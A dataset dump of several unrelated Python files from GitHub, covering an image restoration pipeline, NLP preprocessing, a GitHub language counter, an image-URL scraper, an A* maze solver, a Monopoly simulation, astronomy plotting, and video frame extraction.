\".png\"\n f = open(path, 'wb')\n f.write(image['image_file'])\n f.close()\n print(\"Fetched image (id={0}) into path {1} | Owner: {2}\".format(image_id, path, image['username']))\n return image\n\n def _upload(self, image):\n pr_type = image['pr_type']\n if pr_type == -1:\n return\n elif pr_type == 0:\n path = '../RealSR/results/Sharpic-SR/DIV2K/' + str(image['id']) + \".png\"\n elif pr_type == 1:\n path = '../BOPB/result/old/final_output/' + str(image['id']) + \".png\"\n elif pr_type == 2:\n path = '../BOPB/result/old_w_scratch/final_output/' + str(image['id']) + \".png\"\n elif pr_type == 3:\n path = '../waifu2x/results/' + str(image['id']) + \".png\"\n else:\n raise ValueError(\"Error: up value is not 0, 1, 2 or 3\")\n print(\"Uploading \", path)\n assert os.path.exists(path), \"Error: path does not exist\"\n file_size = os.path.getsize(path)\n f = open(path, 'rb')\n\n file_data = f.read()\n\n # sha256 object create\n sha256 = hashlib.sha256()\n # sha256 update\n sha256.update(file_data)\n image['image_hash'] = sha256.hexdigest()\n\n self.minioClient.fput_object(\"images\", image['image_hash'], path)\n\n # insert\n self.curs.execute(\"INSERT INTO processed_image(id, username, image_name, image_hash, size, up) VALUES (%s, %s, %s, %s, %s, %s) RETURNING id\",\n (image['id'], image['username'], image['image_name'], image['image_hash'], file_size, pr_type))\n self.conn.commit()\n f.close()\n print(\"Stored image(id={0}) into DB\".format(image['id']))\n\n def process_db(self, image_id_list):\n\n image_list = []\n for image_id in image_id_list:\n # pass\n image_list.append(self._download(image_id))\n\n import os\n # get name of all files in the directory\n if len(os.listdir('./LQ/0/')) != 0:\n print(\"SR processing does not support CPU\")\n print(\"ONLY support CUDA or MPS\")\n if torch.cuda.is_available():\n print(\"Using GPU\")\n os.system(\"../RealSR/codes/SR_CUDA.sh\")\n else:\n print(\"Using MPS\")\n os.system('../RealSR/codes/SR_MPS.sh')\n\n if len(os.listdir('./LQ/1/')) != 0:\n # change directory using os.chdir()\n os.chdir('../BOPB/')\n os.system('./runner/img_wo_scratches.sh')\n os.chdir('../connects/')\n\n if len(os.listdir('./LQ/2/')) != 0:\n os.chdir('../BOPB/')\n os.system('../BOPB/runner/img_w_scratches.sh')\n os.chdir('../connects/')\n\n if len(os.listdir('./LQ/3/')) != 0:\n os.chdir('../waifu2x/script_generator/')\n os.system('python load_scr_and_run.py')\n os.chdir('../../connects/')\n\n for image in image_list:\n self._upload(image)\n\n print(\"Finished processing\")\n\n \"\"\"\n Clear the local directory\n 1. Delete all files in the directory\n \"\"\"\n def clear_local(self):\n print(\"Clearing local directory ... \")\n for file in os.listdir('./LQ/0/'):\n os.remove('./LQ/0/' + file)\n for file in os.listdir('./LQ/1/'):\n os.remove('./LQ/1/' + file)\n for file in os.listdir('./LQ/2/'):\n os.remove('./LQ/2/' + file)\n for file in os.listdir('./LQ/3/'):\n os.remove('./LQ/3/' + file)\n for file in os.listdir('../RealSR/results/Sharpic-SR/DIV2K/'):\n os.remove('../RealSR/results/Sharpic-SR/DIV2K/' + file)\n for file in os.listdir('../BOPB/result/old/final_output/'):\n os.remove('../BOPB/result/old/final_output/' + file)\n for file in os.listdir('../BOPB/result/old_w_scratch/final_output/'):\n os.remove('../BOPB/result/old_w_scratch/final_output/' + file)\n for file in os.listdir('../waifu2x/results/'):\n os.remove('../waifu2x/results/' + file)\n","repo_name":"GCU-Sharpic/sharpic-imagesr","sub_path":"connects/databases/databases.py","file_name":"databases.py","file_ext":"py","file_size_in_byte":8829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35762263255","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n# @Project :BiLSTM_CRF\n# @File :processing\n# @Date :2021/7/12 20:59\n# @Author :huangjie\n# @Email :728155808@qq.com\n# @Software :PyCharm\n-------------------------------------------------\n\"\"\"\nimport json\n\ndef read_data(fn):\n all_data = []\n with open(fn,\"r\",encoding=\"utf-8\") as f:\n lines = f.readlines()\n s = \"\"\n bio = []\n for line in lines:\n if line == \"\\n\":\n all_data.append({\"text\":s,\"tags\":bio})\n s = \"\"\n bio = []\n continue\n char,tag = line.strip(\"\\n\").split(\" \")\n s += char\n bio.append(tag)\n return all_data\n\ndef generate_scheams(data):\n rel2id = {\"O\":0}\n id2rel = {0:\"O\"}\n for i in data:\n for t in i[\"tags\"]:\n if t not in rel2id:\n rel2id[t] = len(rel2id)\n id2rel[len(id2rel)] = t\n return rel2id,id2rel\n\ndef get_vocab(train_json):\n vocab = {\"pad\":0,\"unk\":1}\n data = json.load(open(train_json,\"r\",encoding=\"utf-8\"))\n for i in data:\n text = i[\"text\"]\n for char in list(text):\n if char not in vocab:\n vocab[char] = len(vocab)\n return vocab\nif __name__ == '__main__':\n file = \"../data/test.char.bmes\"\n data = get_vocab(\"../dataset/train_data.json\")\n json.dump(data,open(\"../dataset/vocab.json\",\"w\",encoding=\"utf-8\"),indent=4,ensure_ascii=False)\n\n","repo_name":"huangjie-nlp/BiLSTMCRF","sub_path":"processing/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"24236831827","text":"from github import Github\nimport json, os\n\nclass GetRepo:\n def __init__(self, acc_tok):\n self.g = Github(\"{}\". format(acc_tok))\n self.emp_dict = {}\n def repo_getter(self):\n for rep in self.g.get_user().get_repos():\n try:\n dict_data = rep.get_languages()\n self.emp_dict.update(dict_data)\n except Exception as e: \n print(e) \n def get_keyval(self):\n for repo in self.g.get_user().get_repos():\n data = repo.get_languages() #placeholder for for dict \n \n for key in data: #Iterating through the dict to print individual values\n \n value = data[key] #value being set to get the value of key\n self.emp_dict[key] = self.emp_dict[key] + value \n","repo_name":"karanpatel3/GitHub-Repository-Scraper-Backend","sub_path":"GitHubScraper.py","file_name":"GitHubScraper.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"322912357","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\ntry:\n # Python 3\n from urllib import request\nexcept ImportError:\n # Python 2\n import urllib2 as request\nimport sys\n\nfrom bs4 import BeautifulSoup\n\nimport re\nfrom urllib.parse import urlparse\nimport urllib.request\n\nimport json\n\ndef main():\n args = sys.argv\n url = 'https://www.google.co.jp/search?tbm=isch&q='+args[1]\n regex = r'[^\\x00-\\x7F]'\n matchedList = re.findall(regex,url)\n for m in matchedList:\n url = url.replace(m, urllib.parse.quote_plus(m, encoding=\"utf-8\"))\n\n #print(url)\n\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0\",\n }\n\n request = urllib.request.Request(url=url, headers=headers)\n response = urllib.request.urlopen(request)\n body = response.read()\n\n #print(body)\n\n # HTML をパースする\n soup = BeautifulSoup(body, \"lxml\")\n\n div_tags = soup.find_all('div', {'class': 'rg_meta'})\n for div_tag in div_tags:\n j = json.loads(div_tag.text)\n print(j[\"ou\"])\n\nif __name__ == '__main__':\n main()","repo_name":"ConohaKaede/ml","sub_path":"image_urls/image_urls_from_google.py","file_name":"image_urls_from_google.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36551482659","text":"import numpy as np\nfrom heapq import heappush, heappop\nfrom animation import draw\nimport argparse\n\nclass Node():\n \"\"\"\n cost_from_start - the cost of reaching this node from the starting node\n state - the state (row,col)\n parent - the parent node of this node, default as None\n \"\"\"\n def __init__(self, state, cost_from_start, parent = None):\n self.state = state\n self.parent = parent\n self.cost_from_start = cost_from_start\n\n\nclass Maze():\n \n def __init__(self, map, start_state, goal_state, map_index):\n self.start_state = start_state\n self.goal_state = goal_state\n self.map = map\n self.visited = [] # state\n self.m, self.n = map.shape \n self.map_index = map_index\n\n def draw(self, node):\n path=[]\n while node.parent:\n path.append(node.state)\n node = node.parent\n path.append(self.start_state)\n \n draw(self.map, path[::-1], self.map_index)\n\n def goal_test(self, current_state):\n if current_state == self.goal_state:\n return True\n return False\n\n def get_cost(self, current_state, next_state):\n return 1\n\n def get_successors(self, state):\n direction_rows = [0, 0, -1, 1]\n direction_columns = [-1, 1, 0, 0]\n state_row = state[0]\n state_column = state[1]\n successors = []\n\n for i in range(4):\n new_row = state_row + direction_rows[i]\n new_column = state_column + direction_columns[i]\n if self.map[new_row, new_column] != 0.0:\n successors.append((state[0] + direction_rows[i], state[1] + direction_columns[i]))\n\n return successors\n\n # heuristics function\n def heuristics(self, state):\n return abs(state[0] - self.goal_state[0]) + abs(state[1] - self.goal_state[1])\n\n # priority of node \n def priority(self, node):\n return node.cost_from_start + self.heuristics(node.state)\n\n # solve it\n def solve(self):\n if self.goal_test(self.start_state):\n return\n\n self.visited.append(self.start_state)\n first_node = Node(self.start_state, 0, None)\n count = 0\n priority_queue = [(self.priority(first_node), count, first_node)]\n\n while priority_queue:\n best_node = heappop(priority_queue)[2]\n\n successors = self.get_successors(best_node.state)\n\n for successor in successors:\n if successor in self.visited:\n continue\n self.visited.append(successor)\n\n next_node = Node(successor, best_node.cost_from_start + self.get_cost(best_node.state, successor), best_node)\n if self.goal_test(successor):\n self.draw(next_node)\n return\n count += 1\n heappush(priority_queue, (self.priority(next_node), count, next_node))\n\n \nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='maze')\n parser.add_argument('-index', dest='index', required = True, type = int)\n index = parser.parse_args().index\n\n # Example:\n # Run this in the terminal solving map 1\n # python maze_astar.py -index 1\n \n data = np.load('map_'+str(index)+'.npz')\n map, start_state, goal_state = data['map'], tuple(data['start']), tuple(data['goal'])\n\n game = Maze(map, start_state, goal_state, index)\n game.solve()\n ","repo_name":"Nathan-Hutton/Maze-AStar","sub_path":"maze_astar.py","file_name":"maze_astar.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15904511396","text":"from random import *\nfrom colorama import Fore, Style\nfrom copy import deepcopy\ntotals = []\nspaces = [\n\t\"go\",\"brown1\",\"chest\",\"brown2\",\"incTax\",\"rail1\",\"lightBlue1\",\"chance\",\"lightBlue2\",\"lightBlue3\", # First Row\n\t\"visitJail\",\"purple1\",\"electric\",\"purple2\",\"purple3\",\"rail2\",\"orange1\",\"chest\",\"orange2\",\"orange3\", # Second Row\n\t\"parking\",\"red1\",\"chance\",\"red2\",\"red3\",\"rail3\",\"yellow1\",\"yellow2\",\"water\",\"yellow3\", # Third Row\n\t\"toJail\",\"green1\",\"green2\",\"chest\",\"green3\",\"rail4\",\"chance\",\"blue1\",\"luxTax\",\"blue2\" # Final Row\n]\n\nchestcards = [\n\t\"gotoGo\",\"gotoJail\",\n\t\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\",\"N/A\"\n]\nchancecards = [\n\t\"back3\",\"gotoGo\",\"gotoJail\",\"gotoR3\",\"gotoP1\",\"gotoB2\",\"gotoRail\",\"gotoRail\",\"gotoUtil\",\"gotoRail1\",\n\t\"exitJail\",\"money\",\"money\",\"money\",\"money\",\"money\"\n]\n\nfor x in range(len(spaces)):\n\ttotals.append(0)\n\n\n\t\nclass player(object):\n\tspace=0\n\tmoney=0\n\n\n\n\n\tdef roll(self):\n\n\t\trolled = getroll()\n\t\tself.space += rolled\n\t\tif self.space > (len(spaces)-1):\n\t\t\tself.space -= (len(spaces))\n\n\t\t\n\n\t\t\n\n\t\tif spaces[self.space] == \"chance\":\n\t\t\tself.chance()\n\t\t\t#pass\n\n\t\tif spaces[self.space] == \"chest\":\n\t\t\tself.chest()\n\t\t\t#pass\n\n\t\tspacesout[self.space] += 1\n\n\n\t\tif self.space == 30: # The to jail space\n\t\t\tself.space = 10\n\t\t\n\n\n\n\n\n\tdef chance(self):\n\t\t#\"back3\",\"gotoGo\",\"gotoJail\",\"gotoR3\",\"gotoP1\",\"gotoB2\",\"gotoRail\",\"gotoRail\",\"gotoUtil\",\"gotoRail1\"\n\t\trcard = chancecurrent.pop(0)\n\t\tchancecurrent.append(rcard)\n\t\t#rcard = randint(1,16)\n\t\tif rcard == \"gotoGo\":\n\t\t\tself.space = 0\n\n\t\telif rcard == \"gotoR3\":\n\t\t\tself.space = spaces.index(\"red3\")\n\n\t\telif rcard == \"gotoP1\":\n\t\t\tself.space = spaces.index(\"purple1\")\n\n\t\telif rcard == \"gotoUtil\":\n\t\t\tspace1 = spaces.index(\"water\")\n\t\t\tspace2 = spaces.index(\"electric\")\n\t\t\td1 = abs(self.space-space1)\n\t\t\td2 = abs(self.space-space2)\n\t\t\tif d1 > d2:\n\t\t\t\tself.space = space1\n\t\t\telse:\n\t\t\t\tself.space = space2\n\n\t\telif rcard == \"gotoRail\":\n\t\t\tspace1 = spaces.index(\"rail1\")\n\t\t\tspace2 = spaces.index(\"rail2\")\n\t\t\tspace3 = spaces.index(\"rail3\")\n\t\t\tspace4 = spaces.index(\"rail4\") \n\t\t\td1 = abs(self.space-space1)\n\t\t\td2 = abs(self.space-space2)\n\t\t\td3 = abs(self.space-space3)\n\t\t\td4 = abs(self.space-space4)\n\t\t\ttrains = [d1,d2,d3,d4]\n\t\t\tgoto = min(trains)\n\t\t\tself.space = abs(self.space-goto)\n\n\t\telif rcard == \"back3\":\n\t\t\tself.space = self.space - 3\n\t\t\tif self.space < 0:\n\t\t\t\tself.space += (len(spaces))\n\n\t\telif rcard == \"gotoJail\":\n\t\t\tself.space = 10\n\n\t\telif rcard == \"gotoRail1\":\n\t\t\tself.space = spaces.index(\"rail1\")\n\n\t\telif rcard == \"gotoB2\":\n\t\t\tself.space = spaces.index(\"blue2\")\n\n\n\tdef chest(self):\n\t\tcCard = chestcards.pop(0)\n\t\tif cCard == \"gotoGo\":\n\t\t\tself.space = 0\n\t\tif cCard == \"gotoJail\":\n\t\t\tself.space = 10\n\t\tchestcards.append(cCard)\n\t\t#cCard = randint(1,16)\n\t\t#if cCard == 1:\n\t\t#\tself.space = 0\n\t\t#elif cCard == 2:\n\t\t#\tself.space = 10\n\n\t\t#print(self.space)\n\t\t#print(spaces[self.space])\n\n\n\n\n\n\n\ndef getroll():\n\t#droll = randint(1,6)\n\t#droll2 = randint(1,6)\n\t#froll = droll+droll2\n\tdice1 = [1,2,3,4,5,6]\n\tdice2 = [1,2,3,4,5,6]\n\tshuffle(dice1)\n\tshuffle(dice2)\n\trandindex = randint(0,5)\n\trandindex2 = randint(0,5)\n\tfroll = dice1[randindex] + dice2[randindex2]\n\treturn froll\n\np1 = player()\np2 = player()\np3 = player()\np4 = player()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nfor g in range(50): # Run 10 games\n\n\t#print(spaces)\n\n\tspacesout = []\n\n\tfor x in range(len(spaces)):\n\t\tspacesout.append(0)\n\n\n\tchestcurrent = deepcopy(chestcards)\n\tshuffle(chestcurrent)\n\tchancecurrent = deepcopy(chancecards)\n\tshuffle(chancecurrent)\n\t#print(chancecurrent)\n\t#print(chestcurrent)\n\n\tp1.space = 0\n\tp2.space = 0\n\tp3.space = 0\n\tp4.space = 0\n\t\n\n\tfor x in range(75):\n\t\tp1.roll()\n\t\tp2.roll()\n\t\tp3.roll()\n\t\tp4.roll()\n\n\toutput = f\"Spaces of game {g+1}: \"\n\tfor x in range(len(spaces)):\n\t\toutput += f\"{Fore.GREEN}{spaces[x]}{Style.RESET_ALL}:{Fore.RED}{spacesout[x]}{Style.RESET_ALL}, \"\n\n\n\tprint(output)\n\n\n\tfor x in range(len(spacesout)):\n\t\ttotals[x] += spacesout[x]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nspacesN = deepcopy(spaces)\ntotalsN = deepcopy(totals)\n\noutput = \"Final Spaces: \"\nfor x in range(len(spaces)):\n\toutput += f\"{Fore.GREEN}{spaces[x]}{Style.RESET_ALL}:{Fore.RED}{totals[x]}{Style.RESET_ALL}, \"\n\nprint(\"\\n\\n\\n\")\nprint(output)\nprint(\"\\n\")\nhighest = max(totals)\nindex = totals.index(highest)\nprint(f\"Highest Value is: {highest} on {spaces[index]}\")\ntotals.pop(index)\nspaces.pop(index)\n\nhighest = max(totals)\nindex = totals.index(highest)\nprint(f\"Second Greatest Value is: {highest} on {spaces[index]}\")\ntotals.pop(index)\nspaces.pop(index)\n\nhighest = max(totals)\nindex = totals.index(highest)\nprint(f\"Third Greatest Value is: {highest} on {spaces[index]}\")\ntotals.pop(index)\nspaces.pop(index)\n\n'''\nspaces = [\n\t\"go\",\"brown1\",\"chest\",\"brown2\",\"incTax\",\"rail1\",\"lightBlue1\",\"chance\",\"lightBlue2\",\"lightBlue3\", # First Row\n\t\"visitJail\",\"purple1\",\"electric\",\"purple2\",\"purple3\",\"rail2\",\"orange1\",\"chest\",\"orange2\",\"orange3\", # Second Row\n\t\"parking\",\"red1\",\"chance\",\"red2\",\"red3\",\"rail3\",\"yellow1\",\"yellow2\",\"water\",\"yellow3\", # Third Row\n\t\"toJail\",\"green1\",\"green2\",\"chest\",\"green3\",\"rail4\",\"chance\",\"blue1\",\"luxTax\",\"blue2\" # Final Row\n]\n'''\nbrown = 0\nrail = 0\nlightBlue = 0\npurple = 0\nutil = 0\norange = 0\nred = 0\nyellow = 0\ngreen = 0\nblue = 0\nfor x in spacesN:\n\tif \"brown\" in x:\n\t\tbrown += totalsN[spacesN.index(x)]\n\telif \"rail\" in x:\n\t\trail += totalsN[spacesN.index(x)]\n\telif \"lightBlue\" in x:\n\t\tlightBlue += totalsN[spacesN.index(x)]\n\telif \"purple\" in x:\n\t\tpurple += totalsN[spacesN.index(x)]\n\telif \"electric\" == x or \"water\" == x:\n\t\tutil += totalsN[spacesN.index(x)]\n\telif \"orange\" in x:\n\t\torange += totalsN[spacesN.index(x)]\n\telif \"red\" in x:\n\t\tred += totalsN[spacesN.index(x)]\n\telif \"yellow\" in x:\n\t\tyellow += totalsN[spacesN.index(x)]\n\telif \"green\" in x:\n\t\tgreen += totalsN[spacesN.index(x)]\n\telif \"blue\" in x:\n\t\tblue += totalsN[spacesN.index(x)]\n\noutput = \"\\n\\n\\nTOTALS: \"\n\noutput += f\"Brown:{Fore.BLACK}{brown}{Style.RESET_ALL}, \"\noutput += f\"Rail:{Fore.CYAN}{rail}{Style.RESET_ALL}, \"\noutput += f\"Light Blue:{Fore.BLUE}{lightBlue}{Style.RESET_ALL}, \"\noutput += f\"Purple:{Fore.MAGENTA}{purple}{Style.RESET_ALL}, \"\noutput += f\"Util:{Fore.CYAN}{util}{Style.RESET_ALL}, \"\noutput += f\"Orange:{Fore.YELLOW}{orange}{Style.RESET_ALL}, \"\noutput += f\"Red:{Fore.RED}{red}{Style.RESET_ALL}, \"\noutput += f\"Yellow:{Fore.YELLOW}{yellow}{Style.RESET_ALL}, \"\noutput += f\"Green:{Fore.GREEN}{green}{Style.RESET_ALL}, \"\noutput += f\"Blue:{Fore.BLUE}{blue}{Style.RESET_ALL}\"\n\nprint(output)\n\nfinalresults = [brown,rail,lightBlue,purple,util,orange,red,yellow,green,blue]\nfinalresultscolors = [\"brown\",\"rail\",\"lightBlue\",\"purple\",\"util\",\"orange\",\"red\",\"yellow\",\"green\",\"blue\"]\n\n\nprint(\"\\n\")\nhighest = max(finalresults)\nindex = finalresults.index(highest)\nprint(f\"Highest Value is: {highest} on {finalresultscolors[index]}\")\nfinalresults.pop(index)\nfinalresultscolors.pop(index)\n\nhighest = max(finalresults)\nindex = finalresults.index(highest)\nprint(f\"Second Greatest Value is: {highest} on {finalresultscolors[index]}\")\nfinalresults.pop(index)\nfinalresultscolors.pop(index)\n\nhighest = max(finalresults)\nindex = finalresults.index(highest)\nprint(f\"Third Greatest Value is: {highest} on {finalresultscolors[index]}\")\nfinalresults.pop(index)\nfinalresultscolors.pop(index)\n\n\nhighest = max(finalresults)\nindex = finalresults.index(highest)\nprint(f\"Fourth Greatest Value is: {highest} on {finalresultscolors[index]}\")\nfinalresults.pop(index)\nfinalresultscolors.pop(index)","repo_name":"MathIAStuff/MathExploration","sub_path":"mathExploration.py","file_name":"mathExploration.py","file_ext":"py","file_size_in_byte":7383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72224365695","text":"import numpy as np\nimport pickle\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport utils\nfrom scipy import stats\nfrom filter import *\n\n'''\nThis code plots a bunch of explorative plots. Elements that are plotted are, amongst others, histogram distributions of systematic parameters, 2D histograms of ngal vs. a systematic parameter, \na correlation plot, the binned ngal vs. systematic parameter plots.\n'''\n\n#data_dir = utils.dat_dir()\ndata_dir = '/disks/shear12/dombrovskij/systematic_maps/data/'\n#graph_dir = utils.fig_dir()\ngraph_dir = '/disks/shear12/dombrovskij/systematic_maps/graphs/'\n\nwith open(data_dir+'/pixel_data.pickle', 'rb') as handle:\n\tpixel_data = pickle.load(handle)\n\t \nprint('Parameters: {}'.format(pixel_data.columns))\n\ntemp = fraction_lim(pixel_data, frac_lim=0.1) #Only use pixels with fraction higher than 0.1\n\nuse_cols = [x for x in pixel_data.columns if (x != 'fraction') & (x != 'ngal_norm')]\t\t\n \n#filtered_pixel_data = percentile_cuts(temp, use_cols, low_cut=5, high_cut=95, verbose=True) #Perform percentile cuts on all use_cols (currently doesn't remove any datapoints)\t\n\nX = pixel_data[use_cols].copy()\nY = pixel_data['ngal_norm'].values\nZ = pixel_data['fraction'].values\n\nprint('Number of zeros: {}'.format(len(np.where(Y==0)[0])))\n\ndef plot_hist_single(data, bins=20, lw=2, log=False, ylim = None, cumulative = False, x_label='', y_label='', title=None):\n\n\t'''\n\tPlot a single histogram of the input data (should contain only 1 parameter).\n\t'''\n\n\tf, ax = plt.subplots(figsize=(9,7))\n\t\n\tplt.hist(data, bins=bins, histtype='step', cumulative=cumulative, lw=lw, color='black')\n\t\n\tif log:\n\t\tax.set_yscale('log')\n\t\t\n\tif ylim:\n\t\tax.set_ylim(ylim)\n\t\n\tplt.xticks(fontsize=18)\n\tplt.yticks(fontsize=18)\n\t\n\tplt.xlabel(x_label, fontsize=18)\n\tplt.ylabel(y_label, fontsize=18)\n\t\n\tplt.tight_layout()\n\tplt.show()\n\tif title:\n\t\tf.savefig(graph_dir+'data_exploration/'+title+'.png')\n\t\n\treturn None\n\ndef plot_hist(pixel_data):\n\n\t'''\n\treturns a multi-panel panel plot with each panel showing \n\tthe histogram of a systematic parameter\n\t'''\n\t\n\t#cols = [x for x in pixel_data.columns if 'fraction' not in x]\n\tcols = pixel_data.columns\n\tncols = len(cols)\n\n\tnr, nc = len(cols)/3, 3\n\tfig , axs = plt.subplots(nrows= nr, ncols= nc , sharex= False, sharey= False, figsize= (15,10))\n\tcnt = 0\n\tfor i in range(nr):\n\t\tfor j in range(nc):\n\n\t \t\thist = axs[i,j].hist(pixel_data[cols[cnt]], bins= 20, histtype= \"step\")\n\t \t\taxs[i,j].set_xlabel(cols[cnt])\n\t \t\taxs[i,j].set_ylabel(\"counts\")\n\t \t\tcnt+=1\n\tplt.tight_layout()\n\tplt.savefig(graph_dir+\"data_exploration/sys_hist.png\")\t \n\n\treturn None\n\t\ndef plot_2dhist(X,Y, bins=100, y_lim = None):\n\n\t'''\n\tReturns a multi-panel plot with each panel showing the 2d histogram of a systematic parameter\n\twith the normalized galaxy density\n\t'''\n\n\tcols = X.columns\n\tncols = len(cols)\n\n\tnr, nc = len(cols)/3, 3\n\tfig, axs = plt.subplots(nrows=nr, ncols=nc, sharex=False, sharey=True, figsize=(15,10))\n\tcnt = 0\n\n\tfor i in range(nr):\n\t\tfor j in range(nc):\n\t\t\n\t\t\ty = Y\n\t\t\tx = X[cols[cnt]]\n\n\t\t\tcounts, xedges, yedges, im = axs[i,j].hist2d(x,y, bins=bins)\n\t\t\t#plt.colorbar(im, ax=axs[i,j])\n\n\n\t\t\taxs[i,j].set_xlabel(cols[cnt], fontsize=14)\n\t\t\taxs[i,j].set_ylabel(r\"$n_{\\rm gal}/\\bar{n}_{\\rm gal}$\", fontsize=14)\n\n\t\t\tcnt += 1\n\n\tplt.tight_layout()\n\tfig.subplots_adjust(top=0.88)\n\t\n\tif y_lim:\n\t\tplt.ylim(y_lim)\n\tplt.savefig(graph_dir+\"data_exploration/sys_2dhist.png\")\t \n\tplt.show()\n\t\n\treturn None\n\t\ndef plot_scatter(X,Y, s=15, xlim = None, ylim = None, x_label='', y_label='', title='temp'):\n\n\t'''\n\tCreates scatterplot of Y vs. X. \n\t'''\n\n\tf, ax = plt.subplots(figsize=(9,7))\n\t\n\tplt.scatter(X, Y, s=s, color='black')\n\t\n\tif xlim:\n\t\tax.set_xlim(xlim)\n\t\t\n\tif ylim:\n\t\tax.set_ylim(ylim)\n\t\n\tplt.xticks(fontsize=18)\n\tplt.yticks(fontsize=18)\n\t\n\tplt.xlabel(x_label, fontsize=18)\n\tplt.ylabel(y_label, fontsize=18)\n\t\n\tplt.tight_layout()\n\tplt.show()\n\tf.savefig(graph_dir+'data_exploration/'+title+'.png')\n\t\n\treturn None\n\ndef plot_corr(X):\n\n\n\t'''\n\treturns a correlation matrix \n\tof the systematic parameters\n\tinput: pixel_data\n\t'''\n\t\n\tcorr = X.corr() #compute the correlation matrix\n\n\t# Generate a mask for the upper triangle\n\tmask = np.zeros_like(corr, dtype=np.bool)\n\tmask[np.triu_indices_from(mask)] = True\n\n\t# Set up the matplotlib figure\n\tf, ax = plt.subplots(figsize=(11, 9))\n\n\t# Generate a custom diverging colormap\n\tcmap = sns.diverging_palette(220, 10, as_cmap=True)\n\n\t# Draw the heatmap with the mask and correct aspect ratio\n\tsns.heatmap(corr, mask=mask, cmap=cmap, vmax=.3, center=0,\n\t square=True, linewidths=.5, cbar_kws={\"shrink\": .5})\n\n\tf.savefig(graph_dir+\"data_exploration/sys_corr.png\")\t \n\n\treturn None\n\ndef plot_ngal(ngal_norm, pixel_data, pixel_fraction, nbins, percut, average_mode = 'median', title=None):\n\n\t'''\n\treturns a multipanel figure, with each panel \n\tshowing the trend between the normalized \n\tgal number density and a systematic parameters\n\tInputs: \n\t ngal_norm = normalized ngal,\n\t averge_mode = if 'mean', then the mean density in each bin is computed\n\t\t if 'median', then the median density in each bin is computed\n\t \t default: 'median'\n\t pixel_data = a dataframe with the same number of rows as \n\t ngals, each column correspond to a systematic parameter;\n\t nbins + number of bins for making the plots\n\t percut = a tuple containing the desired lower and upper \n\t percentile cuts to be applied to the systematic parameters\n\t'''\n\t\n\tcols = pixel_data.columns\n\tncols = len(cols)\n\n\tnr, nc = len(cols)/3, 3\n\tfig , axs = plt.subplots(nrows= nr, ncols= nc , sharex= False, sharey= False, figsize= (15,10))\n\tcnt = 0\n\tfor i in range(nr):\n\t\tfor j in range(nc):\n\n\t\t\ty = ngal_norm\n\t\t\tx = pixel_data[cols[cnt]]\n\t\t\tz = pixel_fraction\n\n\t\t\t# Compute the upper and lower percentile cuts\n\t\t\tpercs = np.percentile(x, [percut[0], percut[1]])\n\n\t\t\t# Define a mask based on the percentile cuts\n\t\t\tmask = (x>percs[0])&(x ',dst)\n # shutil.copy(src, dst)\n # j += 1\n #\n # i += limit\n # print()\n\n # single_frames_path = os.path.join(path, video[\"name\"].split('.mp4')[0])\n # for src in list(paths.list_images(single_frames_path)):\n # dst = data_path + fr'\\{i:05d}.jpg'\n # print(dst)\n # shutil.copy(src, dst)\n # i += 1\n\n frames_num = 0\n values = list(video.values())[1:]\n for value in values:\n frames_num += (value[1] - value[0])\n\n frames_num = frames_num // interval\n print(frames_num)\n\n video_path = os.path.join(videos_path, video[\"name\"])\n cap = cv2.VideoCapture(video_path)\n\n print(video_path)\n j = 0\n k = 0\n while cap.isOpened():\n _, image = cap.read()\n resized_img = image[260:, :, :]\n resized_img = cv2.copyMakeBorder(resized_img, 20, 0, 0, 0, cv2.BORDER_REPLICATE)\n\n img_path = data_path + fr'\\{i:05d}.jpg'\n\n if values[k][0] < j <= values[k][1] and j%interval==0:\n if np.any(image):\n if not os.path.exists(img_path):\n cv2.imwrite(img_path, resized_img)\n\n print(f'{j}, {i:05d}, copy')\n i += 1\n else:\n print(f'{j}, {i:05d}, already exists')\n i += 1\n else:\n print('corrupt image')\n\n if j > values[k][1]:\n print('k+1, k=', k)\n print(f'{values[k][0]}')\n k += 1\n\n\n if j > values[-1][1]:\n print('break')\n break\n\n if i == 30:\n break\n\n j += 1\n print('new dict')\n\n\ndef sort_path(path):\n sorted_path = []\n for file in os.listdir(path):\n number = int(''.join(n for n in file if n.isdigit()))\n sorted_path.append(number)\n\n sorted_path = sorted(sorted_path)\n return [path + fr'\\{str(f)}.jpg' for f in sorted_path]\n\n# i = 0\n# for src in sort_path(video1_path):\n# dst = os.path.join(data_path, f'{i:05d}.jpg')\n# shutil.copy(src, dst)\n# i += 1\n\n# test_idx = 0\n# for train_idx, train_img in enumerate(sorted_train):\n# if train_idx>=train_size:\n# test_img = test_path + fr'\\{test_idx}.jpg'\n# print(train_idx, train_img, '->', test_img)\n# os.replace(train_img, test_img)\n# test_idx += 1\n","repo_name":"MacApos/Road_Signs_Classification","sub_path":"lane_detection3/Archive/video_to_jpg_05.21.py","file_name":"video_to_jpg_05.21.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74073399934","text":"import streamlit as st\nimport pandas as pd\nfrom utils import query_gbq, highlight_by_column\n\n\ndef main():\n 